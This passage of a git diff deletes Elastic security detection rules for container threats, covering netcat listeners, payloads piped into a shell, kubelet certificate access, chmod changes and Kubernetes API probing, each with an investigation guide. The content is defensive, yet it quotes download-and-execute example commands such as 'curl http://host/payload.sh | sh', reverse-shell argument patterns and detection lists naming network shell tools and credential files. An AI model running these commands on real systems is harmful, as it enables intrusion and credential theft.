"https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml deleted file mode 100644 index a7076eb7113..00000000000 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml +++ /dev/null @@ -1,93 +0,0 @@ -[metadata] -creation_date = "2026/02/06" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects when an interactive process creates a file inside of a system binary location, inside of a running -container. The system binary locations are /etc, /root, /bin, /usr/bin, /usr/local/bin, and /entrypoint. Adversaries -may use these locations to create files that can be used to execute commands on the underlying host, or to evade -detection by security controls. -""" -from = "now-6m" -index = ["logs-cloud_defend.file*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "System Path File Creation and Execution Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating System Path File Creation and Execution Detected via Defend for Containers - -This detects an interactive session in a running Linux container creating new files under system binary paths like /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint, which often signals an attempt to tamper with execution flow or hide tooling. Attackers commonly gain a shell, then use curl/wget (or a busybox variant) from a writable staging area to drop a new executable into /usr/local/bin or overwrite an entrypoint script to ensure their code runs on start. - -### Possible investigation steps - -- Capture the created file’s metadata (owner, permissions, timestamps) and contents/hash, then determine whether it is an executable/script or a modification to startup/auth/config behavior. -- Compare the file and its path against the container image baseline (layer diff) to confirm it was introduced at runtime and identify the interactive command that created it. -- Review the interactive session context (TTY, user, entry method) and surrounding command activity to assess intent and whether secrets or credentials were accessed. -- Pivot to related activity from the same session such as outbound connections, additional downloads to writable staging areas, or subsequent execution of the new file to gauge impact and scope. -- Check for persistence or host-impact setup by inspecting entrypoint/service definitions, PATH hijacks, mounted host paths, and any new cron/systemd/profile changes within the container. - -### False positive analysis - -- A container administrator troubleshooting interactively may use curl/wget (including via busybox wget) to fetch configuration or helper scripts and write them into /etc, /root, or /entrypoint to quickly test startup or runtime behavior changes. -- An interactive maintenance session may execute a script staged in /tmp or /dev/shm that drops a small wrapper binary or symlink into /usr/local/bin or /usr/bin to temporarily add debugging utilities or adjust PATH-resolved command behavior during incident response. - -### Response and remediation - -- Isolate the impacted container by removing it from service and blocking its egress, then preserve the container filesystem (or take a snapshot) so the created artifacts under /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint can be analyzed. -- Identify and remove the dropped or modified file(s) and any related persistence (e.g., altered /entrypoint script, PATH-hijacking binaries, modified shell profiles), then stop any processes launched from writable staging paths like /tmp, /dev/shm, /var/tmp, /run, /var/run, or /mnt. -- Redeploy the workload from a known-good image and verified configuration (including entrypoint and mounted volumes), rotate any secrets or tokens that could have been accessed in the interactive session, and validate the new pod/container does not recreate files in system binary locations. -- Escalate immediately to the incident response team if the created file is executable, replaces an entrypoint, initiates outbound downloads or connections, or if multiple containers show similar drops in system binary paths suggesting broader compromise. -- Harden by enforcing non-root, read-only root filesystem, and disallowing interactive exec into production containers, then restrict outbound network access and block write access to system binary locations via security policies and runtime controls.""" -risk_score = 47 -rule_id = "05a50000-9886-4695-ad33-3f990dc142e2" -severity = "medium" -tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -file where host.os.type == "linux" and event.type == "creation" and process.interactive == true and -file.path like ( - "/etc/*", "/root/*", "/bin/*", "/usr/bin/*", "/usr/local/bin/*", "/entrypoint*" -) and ( - process.name like ("wget", "curl") or - (process.name == "busybox" and process.args == "wget") or - process.executable like ("/tmp/*", "/dev/shm/*", "/var/tmp/*", "/run/*", "/var/run/*", "/mnt/*") -) and container.id like "?*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml deleted file mode 100644 index eec7a040eab..00000000000 --- a/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml +++ /dev/null @@ -1,115 +0,0 @@ -[metadata] -creation_date = "2023/04/26" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects an established netcat file transfer or listener running inside a container. Netcat is a utility -used for reading and writing data across network connections, and it can be used for malicious purposes such as -establishing a backdoor for persistence, exfiltrating data or file transfer. -""" -false_positives = [ - """ - There is a potential for false positives if the container is used for legitimate tasks that require the use of - netcat, such as network troubleshooting, testing or system monitoring. It is important to investigate any alerts - generated by this rule to determine if they are indicative of malicious activity or part of legitimate container - activity. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Netcat File Transfer or Listener Detected via Defend for Containers" -note = """## Setup - -## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Netcat File Transfer or Listener Detected via Defend for Containers - -Netcat is a versatile networking tool used for reading and writing data across network connections, often employed for legitimate purposes like debugging and network diagnostics. However, adversaries can exploit Netcat to establish unauthorized backdoors or exfiltrate data from containers. The detection rule identifies suspicious Netcat activity by monitoring process events within containers, focusing on specific arguments that indicate a listening state, which is a common trait of malicious use. This proactive detection helps mitigate potential threats by flagging unusual network behavior indicative of compromise. - -### Possible investigation steps - -- Review the container ID associated with the alert to identify the specific container where the Netcat listener was established. This can help in understanding the context and potential impact. -- Examine the process name and arguments to confirm the presence of Netcat and its listening state. Look for arguments like "-l", "--listen", "-p", or "--source-port" to verify the listener setup. -- Check the parent process of the Netcat instance to determine how it was initiated. This can provide insights into whether it was started by a legitimate application or a potentially malicious script. -- Investigate the network connections associated with the container to identify any unusual or unauthorized connections that may indicate data exfiltration or communication with a command and control server. -- Analyze the container's recent activity and logs to identify any other suspicious behavior or anomalies that could be related to the Netcat listener, such as unexpected file modifications or other process executions. -- Assess the container's security posture and configuration to determine if there are any vulnerabilities or misconfigurations that could have been exploited to establish the Netcat listener. - -### False positive analysis - -- Development and testing activities within containers may trigger the rule if Netcat is used for legitimate debugging or network diagnostics. Users can create exceptions for specific container IDs or process names associated with known development environments. -- Automated scripts or tools that utilize Netcat for routine network checks or health monitoring might be flagged. To mitigate this, users can whitelist these scripts by identifying their unique process arguments or execution patterns. -- Containers running network services that rely on Netcat for legitimate communication purposes could be mistakenly identified. Users should document and exclude these services by specifying their container IDs and associated process arguments. -- Security tools or monitoring solutions that incorporate Netcat for legitimate scanning or testing purposes may cause false positives. Users can manage this by excluding these tools based on their known process names and arguments. - -### Response and remediation - -- Immediately isolate the affected container to prevent further unauthorized access or data exfiltration. This can be done by stopping the container or disconnecting it from the network. -- Conduct a thorough review of the container's logs and process history to identify any unauthorized access or data transfers that may have occurred. -- Remove any unauthorized Netcat binaries or scripts found within the container to eliminate the backdoor. -- Rebuild the container from a known good image to ensure no residual malicious artifacts remain. -- Update container images and underlying host systems with the latest security patches to mitigate vulnerabilities that could be exploited by similar threats. -- Implement network segmentation and firewall rules to restrict unauthorized outbound connections from containers, reducing the risk of data exfiltration. -- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other containers or systems within the environment.""" -risk_score = 47 -rule_id = "a52a9439-d52c-401c-be37-2785235c6547" -severity = "medium" -tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - process.name in ("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or - ( - /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "nc", "/bin/nc", "/usr/bin/nc", "/usr/local/bin/nc", - "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", - "netcat", "/bin/netcat", "/usr/bin/netcat", "/usr/local/bin/netcat", - "netcat.openbsd", "/bin/netcat.openbsd", "/usr/bin/netcat.openbsd", "/usr/local/bin/netcat.openbsd", - "netcat.traditional", "/bin/netcat.traditional", "/usr/bin/netcat.traditional", "/usr/local/bin/netcat.traditional" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) -) and -process.args like~ ( - /* bind shell to specific port or listener */ - "-*l*","-*p*", - /* reverse shell to command-line interpreter used for command execution */ - "-*e*", - /* file transfer via stdout/pipe */ - ">","<", "|" -) and process.interactive == true and container.id like "*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml deleted file mode 100644 index 8be32a0812f..00000000000 --- a/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml +++ /dev/null @@ -1,119 +0,0 @@ -[metadata] -creation_date = "2026/02/10" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects when a payload is downloaded and piped to a shell inside a running container. This -could indicate a threat actor downloaded a payload and executed it using a shell without the payload -being stored on the filesystem. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Payload Execution via Shell Pipe Detected by Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Payload Execution via Shell Pipe Detected by Defend for Containers - -This rule detects an interactive session in a running Linux container where a downloader process is immediately followed by a shell execution, consistent with fetching code and executing it without writing a file. This matters because piping remote content directly into a shell enables fast, stealthy execution and can bypass filesystem-based controls and forensics. Attackers commonly run patterns like `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash` during initial foothold or lateral movement inside containers. - -### Possible investigation steps - -- Capture the full interactive command line and session context (TTY/user, working directory, parent chain) to determine whether the shell received stdin from the downloader and what was executed. -- Identify the remote URL/host contacted and pivot on outbound network telemetry (DNS/HTTP/SNI/IP) to confirm download success, reputation, and whether the endpoint has been used by other workloads. -- Enumerate follow-on processes spawned by the shell within the next few minutes (e.g., package installs, compilers, crypto-miners, persistence tooling) to assess impact and scope of execution. -- Check for container breakout or host interaction indicators by reviewing new mounts, access to the Docker/CRI socket, privileged namespace usage, and any writes to host paths from within the container. -- Preserve volatile artifacts by exporting the container filesystem and collecting in-memory/runtime evidence (environment variables, loaded binaries, cron/systemd/user profiles) before the workload is recycled. - -### False positive analysis - -- An administrator or developer may use an interactive exec session to troubleshoot or apply a quick remediation by running `curl`/`wget` piped into `sh` (to avoid saving a temporary file), so validate the interactive user/TTY, parent process chain, and whether the contacted URL/host is an expected internal source. -- During manual container bootstrap or environment setup, an operator may fetch a short initialization or configuration script via `curl`/`wget` and immediately invoke a shell to run it, so confirm it aligns with recent deployment/change activity and that follow-on process, network, and filesystem behavior matches the intended setup. - -### Response and remediation - -- Immediately isolate the affected container/pod by blocking egress and terminating any active `kubectl exec`/interactive sessions that launched `curl`/`wget` and then a shell to stop further command execution. -- Preserve evidence before restart by snapshotting the container image/filesystem and collecting running process trees, open network connections, environment variables, and shell history/output associated with the piped execution. -- Eradicate by deleting and redeploying the workload from a known-good image, rotating any secrets and tokens available to the container, and removing any unauthorized binaries, cron jobs, startup scripts, or modified entrypoints created by the shell session. -- Escalate to incident response immediately if the downloaded content contacted unknown/external infrastructure, spawned post-exploitation tooling (e.g., miners, scanners, reverse shells), or showed signs of host interaction such as access to the container runtime socket or host-mounted paths. -- Harden by restricting interactive exec access (RBAC/MFA/just-in-time), enforcing signed/approved images, applying network policies to limit outbound access, and adding runtime controls to block `curl|sh`/`wget|sh` patterns or require allowlisted internal artifact sources.""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 47 -rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694" -severity = "medium" -tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence by process.parent.entity_id, container.id with maxspan=1s - [process where event.type == "start" and event.action == "exec" and process.name in ("curl", "wget")] - [process where event.action in ("exec", "end") and - /* - If the flow is executed from a parent script, the event action will be "exec". - If the flow is executed manually, the event action will be "end". - */ - process.name like ( - "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox", - "python*", "perl*", "ruby*", "lua*", "php*" - ) and - process.args like ( - "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish", - "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", - "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh", - "/bin/zsh", "/bin/ksh", "/bin/fish", - "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", - "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish", - "-busybox", "busybox", "/bin/busybox", "/usr/bin/busybox", - "*python*", "*perl*", "*ruby*", "*lua*", "*php*", "/dev/fd/*" - ) and - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - )] -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml deleted file mode 100644 index 97d638e70c1..00000000000 --- a/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml +++ /dev/null @@ -1,101 +0,0 @@ -[metadata] -creation_date = "2026/02/02" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the access of the Kubelet certificate file inside a container. The Kubelet certificate file is -used to authenticate the container to the Kubernetes API server, and may be used by an adversary to gain access -to the Kubernetes API server or other resources within the cluster. These files are a common target for adversaries -to gain access to the cluster. There is a current limitation in the defend for containers file sensor that prevents -file open events from being logged for file open events without write intent. -""" -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Kubelet Certificate File Access Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Kubelet Certificate File Access Detected via Defend for Containers - -This detection flags an interactive process inside a Linux container opening files under `/var/lib/kubelet/pki/`, which includes the kubelet client certificate and key used to authenticate to the Kubernetes API. Attackers who obtain these credentials can impersonate the node, enumerate cluster resources, and pivot to secrets or workloads. A common pattern is an operator exec’ing into a compromised pod, locating the kubelet cert/key pair, copying it out, then using it to query the API server from outside the container. - -### Possible investigation steps - -- Identify the pod/namespace/node and owning controller for the container, then confirm whether it should ever have access to host kubelet PKI (e.g., privileged DaemonSet, hostPath mount, node-agent tooling) or if this is an unexpected breakout indicator. -- Review the interactive session context (exec/attach/ssh), including who initiated it and the command history/TTY telemetry around the alert time, to determine whether this was routine debugging or suspicious enumeration. -- Inspect the container filesystem and recent file operations for evidence of credential harvesting (reads of kubelet client cert/key pairs, copies to temporary paths, archive creation, or outbound transfer tooling) and preserve artifacts for forensics. -- Correlate immediately after the access event for Kubernetes API activity using node credentials (unusual discovery, secret access, or cluster-wide queries) originating from the same workload identity, node, or egress address. -- Validate whether kubelet credentials were reused by reviewing API server audit logs for unexpected node identity actions, and rotate kubelet client certs/keys and isolate the workload if misuse is suspected. - -### False positive analysis - -- A cluster operator or SRE may exec into a privileged pod (e.g., a DaemonSet with hostPath access to `/var/lib/kubelet`) for node troubleshooting and use interactive shell commands to inspect or validate kubelet PKI files during incident response or routine maintenance. -- A legitimate containerized node-management or diagnostic workflow that runs interactively (e.g., invoked manually for verification) may open files under `/var/lib/kubelet/pki/` as part of validating kubelet certificate presence/permissions after upgrades, certificate rotation, or node reconfiguration. - -### Response and remediation - -- Immediately isolate the affected workload by scaling the pod/controller to zero or cordoning and draining the node if a privileged pod has host access to `/var/lib/kubelet/pki/`, and preserve the container filesystem and process list for forensics before teardown. -- Remove the execution path that enabled access by deleting or patching the pod/DaemonSet to drop `privileged`, `hostPID/hostNetwork`, and any `hostPath` mounts that expose `/var/lib/kubelet` and redeploy only from a known-good image and manifest. -- Rotate and reissue kubelet client certificates/keys on the impacted node(s) (or replace the node from autoscaling/immutable infrastructure) and verify the old credentials can no longer authenticate to the Kubernetes API server. -- Review Kubernetes API server audit logs for activity using the node identity around the access time (cluster-wide discovery, secret reads, token reviews, exec into other pods) and revoke/rotate any exposed service account tokens or secrets accessed during the window. -- Escalate to the Kubernetes platform/on-call security team immediately if the files include a kubelet client key, if the pod was privileged or had host mounts, or if API audit logs show node credential use from unexpected sources or unusual resource enumeration. -- Harden the cluster by enforcing policies that block hostPath access to `/var/lib/kubelet` and privileged pods (Pod Security Admission/Gatekeeper/Kyverno), limiting interactive exec/attach via RBAC, and monitoring for subsequent access attempts to kubelet PKI paths and related credential exfiltration tooling. -""" -references = [ - "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api", - "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster", - "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/" -] -risk_score = 21 -rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4" -severity = "low" -tags = ["Tactic: Credential Access", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -any where host.os.type == "linux" and process.interactive == true and container.id like "*" and ( - (event.category == "file" and event.type == "change" and event.action == "open" and file.path like "/var/lib/kubelet/pki/*") or - (event.category == "process" and event.type == "start" and event.action == "exec" and - ( - process.name in ("cat", "head", "tail", "more", "less", "sed", "awk") or - process.args in ( - "cat", "/bin/cat", "/usr/bin/cat", "/usr/local/bin/cat", - "head", "/bin/head", "/usr/bin/head", "/usr/local/bin/head", - "tail", "/bin/tail", "/usr/bin/tail", "/usr/local/bin/tail", - "more", "/bin/more", "/usr/bin/more", "/usr/local/bin/more", - "less", "/bin/less", "/usr/bin/less", "/usr/local/bin/less", - "sed", "/bin/sed", "/usr/bin/sed", "/usr/local/bin/sed", - "awk", "/bin/awk", "/usr/bin/awk", "/usr/local/bin/awk" - ) - ) and process.args like "*/var/lib/kubelet/pki/*") -) -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml deleted file mode 100644 index 10daf2c1993..00000000000 --- a/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml +++ /dev/null @@ -1,103 +0,0 @@ -[metadata] -creation_date = "2023/04/26" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file -permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized -or malicious code inside the container. -""" -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "File Execution Permission Modification Detected via Defend for Containers" -note = """## Setup - -## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating File Execution Permission Modification Detected via Defend for Containers - -Containers provide isolated environments for running applications, often on Linux systems. The `chmod` command is used to change file permissions, including making files executable. Adversaries may exploit this by altering permissions to execute unauthorized scripts or binaries, potentially leading to malicious activity. The detection rule identifies such actions by monitoring for `chmod` usage that grants execute permissions, focusing on specific permission patterns, and excluding benign cases. This helps in identifying potential threats where attackers attempt to execute unauthorized code within containers. - -### Possible investigation steps - -- Review the container ID associated with the alert to identify the specific container where the `chmod` command was executed. -- Examine the process arguments to determine the exact permissions that were set and identify the file that was made executable. -- Investigate the origin of the `chmod` command by reviewing the process tree to understand which parent process initiated it and whether it aligns with expected behavior. -- Check the user account or service account that executed the `chmod` command to assess if it has legitimate access and reason to modify file permissions. -- Analyze the file that was made executable to determine its contents and origin, checking for any signs of unauthorized or malicious code. -- Correlate this event with other logs or alerts from the same container to identify any patterns or additional suspicious activities that might indicate a broader attack. - -### False positive analysis - -- Routine maintenance scripts or automated processes may use chmod to set execute permissions on files within containers. To handle these, identify and whitelist specific scripts or processes that are known to be safe and necessary for operations. -- Development environments often involve frequent changes to file permissions as developers test and deploy code. Consider excluding specific container IDs or paths associated with development environments to reduce noise. -- Some container orchestration tools might use chmod as part of their normal operation. Review the processes and arguments associated with these tools and create exceptions for known benign activities. -- System updates or package installations within containers might trigger this rule. Monitor and document regular update schedules and processes, and exclude these from triggering alerts if they are verified as non-threatening. -- If certain users or roles are responsible for legitimate permission changes, consider excluding their activities by user ID or role, ensuring that these exclusions are well-documented and reviewed regularly. - -### Response and remediation - -- Immediately isolate the affected container to prevent further execution of unauthorized code. This can be done by stopping the container or disconnecting it from the network. -- Conduct a thorough review of the container's file system to identify any unauthorized or suspicious files that have been made executable. Remove or quarantine these files as necessary. -- Analyze the container's logs to trace the source of the `chmod` command and determine if there are any other indicators of compromise or related malicious activities. -- If the unauthorized execution is confirmed, assess the potential impact on the host system and other containers. Implement additional security measures, such as enhanced monitoring or network segmentation, to protect other assets. -- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign. -- Review and update container security policies to prevent unauthorized permission changes, such as implementing stricter access controls and using security tools that enforce policy compliance. -- Enhance detection capabilities by configuring alerts for similar suspicious activities, ensuring that any future attempts to modify file permissions within containers are promptly identified and addressed.""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 21 -rule_id = "ec604672-bed9-43e1-8871-cf591c052550" -severity = "low" -tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -any where event.category in ("file", "process") and event.type in ("change", "creation", "start") and ( - process.name == "chmod" or - ( - /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man" - ) - ) -) and process.args in ("4755", "755", "777", "0777", "444", "+x", "a+x") and -container.id like "?*" and not process.args == "-x" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" - -[[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml deleted file mode 100644 index 6b067f4f645..00000000000 --- a/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml +++ /dev/null @@ -1,143 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the execution of direct interactive Kubernetes API requests inside a container. An adversary may -need to execute direct interactive Kubernetes API requests to gain access to the Kubernetes API server or other resources -within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. Note that this rule may not trigger if the -token is expanded within the process argument list, as the length of the "process.args" field may lead to the field being -ignored. -""" -false_positives = [ - """ - There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Direct Interactive Kubernetes API Request Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Direct Interactive Kubernetes API Request Detected via Defend for Containers - -The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat/ncat, or kubectl from inside a container to call the Kubernetes API with a bearer token, often with custom CA or insecure TLS options. An operator enumerates cluster resources and tests access with in-pod credentials, enabling lateral movement or privilege escalation; after landing in a pod, they read the service account token and query the API to list namespaces, pods, or secrets, or issue kubectl get/patch to probe or modify workloads. - -### Possible investigation steps - -- Map the container ID to its pod, namespace, node, image, and owning controller, and confirm whether this workload is expected to make direct Kubernetes API calls 